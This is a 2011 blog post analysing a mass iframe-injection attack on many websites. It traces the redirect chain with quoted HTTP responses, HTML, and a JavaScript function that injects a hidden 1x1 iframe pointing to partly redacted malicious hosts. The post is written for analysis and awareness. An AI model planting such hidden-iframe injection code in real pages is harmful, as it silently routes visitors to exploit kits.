Wednesday, 27 July 2011

Willsy iFrame Attack on 90,000+ Sites

A large number of sites have been attacked in a mass iFrame injection attack that appears to lead to an exploit pack containing numerous exploits for java, flash and PDF vulnerabilities. The anatomy of the attack is shown below. A quick google search results in over 90,000 sites that have been hit.

Upon visiting site, the iframe has been inject alongside the title of the index page. When hit, the remote site is loaded and results in a 302 response that redirects to another site:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Jul 2011 21:39:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Location: http://pa<removed>cky.eu/ext/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
The redirection then leads to page containing a single javascript element.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pafe moved</title>
</head>
<body>
moved
<script type='text/javascript' src='http://ade<removed>rtes.es/images/info/js/js.php'></script>
</body>
</html>
 The PHP page contains a sinlge function reponsible for loading an iframe. This iframe then leads to another site.

function vdeh() {
    if(document.all.length > 3) {
        var dch = document.createElement("iframe");
        dch.id = "dchid";
        dch.src = "http://lab<removed>ce.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34";
        dch.style.width = "1px";
        dch.style.height = "1px";
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdeh()",500);
    }
} setTimeout("vdeh()",500);
This link then leads to another page containing an iframe:

<iframe src="http://lee<removed>t.ru/forum.php?tp=206614280457fe96" width="1" height="1"></iframe>
This final iframe then loads the code responsible for delivering the exploit javascript. This code is heavily obfucsated and consits of a long string of digits in a DIV. The subsequent javascript is reponsible for then deobfuscating the string to javascript, which is execute in an eval statement. The obfuscated code is shown below, along with deobfuscated code. I used firebug to easily remove any unecessary code and reveal the final javascript:
Posted by at 15:02

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)